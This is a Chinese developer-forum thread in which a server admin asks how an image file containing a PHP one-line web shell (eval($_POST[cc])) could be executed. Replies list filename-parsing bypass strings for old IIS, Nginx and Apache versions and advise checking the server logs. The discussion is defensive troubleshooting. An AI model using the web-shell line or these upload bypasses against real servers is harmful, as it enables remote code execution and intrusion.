发现图片里含有一句话木马,含有木马的图片到底是怎么运行的

2017-12-14 15:52:34 +08:00
 zoneself

发现服务器里的一个图片里含有一句话木马
eval($_POST[cc]);
我吧图片下载到本地,在本地环境中引用图片,
没发现什么多余的文件或者恶意代码,请大牛指导下,携带这种木马的图片会不会有风险?
他们在服务器端到底是怎么执行的?
在线等

21089 次点击
所在节点    PHP
35 条回复
Va1n3R
2017-12-14 17:48:06 +08:00
IIS6.0 的解析漏洞 :1.jpg%00.php 1.asp;.jpg 1.asp/1.jpg
IIS 7.0/IIS 7.5/ Nginx <8.03 畸形解析 1.jpg/.php
Nginx <8.03 空字节代码执行漏洞 1.jpg%00.php
Apache 解析漏洞 .php.一个无效后缀
还有就是 Windows 下的各种截断了,因为 win 环境下不允许一些符号命名文件,所以可以造成截断文件名的效果,不过恕我直言,用 Windows 当服务器就是 sb...
CEBBCAT
2017-12-14 17:54:32 +08:00
楼主学艺技能不错
wooyuntest
2017-12-14 18:05:31 +08:00
因为存在解析漏洞
zoneself
2017-12-14 18:15:40 +08:00
@Va1n3R @wooyuntest 解析漏洞都不存在呢
binux
2017-12-14 18:18:39 +08:00
@zoneself 你的思路错了,他上传那个文件不是因为你有这个漏洞,而是在试你是否有这个漏洞。
MOmc
2017-12-14 20:15:44 +08:00
场景可能这样。有人想 getshell,可能是想试试有没有上传漏洞,然后在传的时候直接怼了目前的“图片”(新手来的),然后可能没绕成功就直接把图片怼上去了………还有一种可能就是大家说的解析漏洞,他可能发现你这里有解析漏洞然后直接干(不过楼主说没有解析漏洞那应该是前者吧)………建议楼主查一下日志,看看是哪里有未授权访问到上传功能还是说有注入被打进后台又或者有弱口令等等………查日志吧大兄弟………声明一下我在某安全公司做渗透,正规工作,请某些人不要打扰我谢谢!
Va1n3R
2017-12-14 20:19:19 +08:00
@zoneself 不存在就不存在呗,不试试怎么有没有漏洞,攻击者可能只是测试下而已啊,看日志吧。有没有访问这个图片的
Soar360
2017-12-15 01:28:52 +08:00
A.jpg;.php 经典的 iis6 解析楼顶。
msg7086
2017-12-15 02:13:37 +08:00
要是运行成功了,楼主你还笑呵呵在论坛上和人聊天?怕不是早就在备份数据重装系统了。
zoneself
2017-12-15 09:13:59 +08:00
@MOmc 就是传说中的黑客吧,好怕怕……
@Va1n3R 嗯 准备找那个时间段的日志分析下
@Soar360 漏洞不存在啦,我尝试了
@msg7086 要是运行成功了,我就呵呵了,卷铺盖走人了
mingzu
2017-12-15 09:17:31 +08:00
@zoneself 现在没人用 IIS6 吧,大家的意思是让你排查类似的解析漏洞。微醺..
zoneself
2017-12-15 09:22:54 +08:00
@mingzu 嗯嗯,了解了,谢谢你,也谢谢各位大佬!
RcoIl
2017-12-15 09:53:50 +08:00
首先,图片马是配合解析漏洞或者文件包含才能正常执行。
其次,解析漏洞存在于 apache,iis,Nginx 各个版本(指的是以前的版本)。
然后,这里的文件包含指的是本地包含。
最后,楼主本地 include 线上的图片,要执行也是在本地执行,而不是线上,所以不会对线上有影响。本地测试解析漏洞可以去修改 apache 的配置文件。
ztaosony
2017-12-15 15:36:59 +08:00
说到底所有的方法都是为了让这个图片文件解析成 php 脚本文件。
MOmc
2017-12-16 01:33:31 +08:00
@zoneself 不是不是,大佬我删评论了…

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/414740

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX